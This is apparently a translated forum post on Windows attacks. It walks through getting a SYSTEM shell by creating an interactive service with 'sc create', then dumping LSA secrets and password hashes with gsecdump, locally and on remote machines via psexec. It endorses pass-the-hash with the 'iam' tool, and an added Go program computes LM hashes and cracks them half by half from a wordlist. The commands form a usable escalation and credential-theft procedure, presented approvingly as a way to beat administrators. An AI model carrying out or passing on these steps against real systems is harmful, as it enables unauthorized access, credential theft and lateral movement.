To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ]             show help
-a [ --dump_all ]         dump all secrets
-l [ --dump_lsa ]         dump lsa secrets
-w [ --dump_wireless ]    dump microsoft wireless connections
-u [ --dump_usedhashes ]  dump hashes from active logon sessions
-s [ --dump_hashes ]      dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hash information just captured with gsecdump into the local lsass process and carry out a pass-the-hash attack. Those foreigners really are good; admins are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, or with gethash, actually don't need to be cracked at all; it is just a matter of using the tools. As the original article puts it so well, whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
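To show what the remark about LM hashes being easy to break with rainbow tables, and the "4 characters or 127" comment, actually rest on, here is an added Go example. It is not part of the original post or of the TrueSec article it quotes. It implements the LM hash itself (uppercase, truncate or pad to 14 bytes, split into two independent 7-byte halves, DES-encrypt the constant "KGS!@#$%" with each half), then uses that structure the way a cracker does: the second half of any password of 7 characters or fewer is the fixed value aad3b435b51404ee, and each half can be attacked on its own against a 7-character, case-insensitive keyspace. The sample passwords and the tiny candidate list are constructed for the demonstration; the LM hash of "password", e52cac67419a9a224a3b108f3fa6cb6d, is the well-known reference value.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
)

// lmMagic is the fixed plaintext that every LM half encrypts.
var lmMagic = []byte("KGS!@#$%")

// EmptyHalf is DES("KGS!@#$%") under the all-zero key: the LM half-hash of
// seven NUL bytes, i.e. of an empty or absent second half.
const EmptyHalf = "aad3b435b51404ee"

// desKeyFrom7 spreads 56 password bits over 8 key bytes, leaving the low bit
// of each byte for DES parity (the DES key schedule ignores those bits).
func desKeyFrom7(s []byte) []byte {
	k := []byte{
		s[0] >> 1,
		(s[0]&0x01)<<6 | s[1]>>2,
		(s[1]&0x03)<<5 | s[2]>>3,
		(s[2]&0x07)<<4 | s[3]>>4,
		(s[3]&0x0F)<<3 | s[4]>>5,
		(s[4]&0x1F)<<2 | s[5]>>6,
		(s[5]&0x3F)<<1 | s[6]>>7,
		s[6] & 0x7F,
	}
	for i := range k {
		k[i] <<= 1
	}
	return k
}

// lmHalf DES-encrypts the LM constant with one 7-byte password chunk.
func lmHalf(chunk []byte) []byte {
	block, err := des.NewCipher(desKeyFrom7(chunk))
	if err != nil {
		panic(err) // unreachable: desKeyFrom7 always yields 8 bytes
	}
	out := make([]byte, 8)
	block.Encrypt(out, lmMagic)
	return out
}

// chunk7 uppercases a candidate and fits it into exactly 7 bytes,
// truncating or NUL-padding as LM does.
func chunk7(s string) []byte {
	c := bytes.ToUpper([]byte(s))
	if len(c) > 7 {
		c = c[:7]
	}
	return append(c, make([]byte, 7-len(c))...)
}

// LMHash computes the LAN Manager hash of a password: uppercase it, truncate
// or NUL-pad to 14 bytes, split into two independent 7-byte halves, and
// encrypt "KGS!@#$%" with each half used as a DES key. Returned as 32 hex digits.
func LMHash(password string) string {
	p := bytes.ToUpper([]byte(password))
	if len(p) > 14 {
		p = p[:14]
	}
	p = append(p, make([]byte, 14-len(p))...)
	return hex.EncodeToString(append(lmHalf(p[:7]), lmHalf(p[7:])...))
}

// AtMostSevenChars reports whether the second half is the empty-half
// constant, which tells an attacker the password is 7 characters or fewer
// before any cracking starts.
func AtMostSevenChars(lmHex string) bool {
	return len(lmHex) == 32 && lmHex[16:] == EmptyHalf
}

// CrackHalf attacks one 16-hex-digit half on its own. Because the halves are
// independent, each is a separate 7-character, case-insensitive search, which
// is why LM rainbow tables are small and fast. Returns the uppercase chunk.
func CrackHalf(halfHex string, candidates []string) (string, bool) {
	for _, cand := range candidates {
		chunk := chunk7(cand)
		if hex.EncodeToString(lmHalf(chunk)) == halfHex {
			return string(bytes.TrimRight(chunk, "\x00")), true
		}
	}
	return "", false
}

func main() {
	// Constructed sample passwords for the demo; not captured hashes.
	for _, pw := range []string{"", "passwor", "password", "PaSsWoRd"} {
		h := LMHash(pw)
		fmt.Printf("%-10q LM=%s short=%v\n", pw, h, AtMostSevenChars(h))
	}
	// Crack each half of LM("password") separately with a tiny constructed wordlist.
	h := LMHash("password")
	first, _ := CrackHalf(h[:16], []string{"secret", "letmein", "passwor"})
	second, _ := CrackHalf(h[16:], []string{"d", "x"})
	fmt.Println("recovered:", first+second)
}
```

Note that case folding and the 14-byte truncation mean "PaSsWoRd" and "password" produce the same LM hash, and that the recovered plaintext is only the uppercase form; the NT hash (MD4 over UTF-16LE) has none of this structure, which is why the post's point about reusing the hash directly (pass-the-hash) matters even when cracking is hopeless.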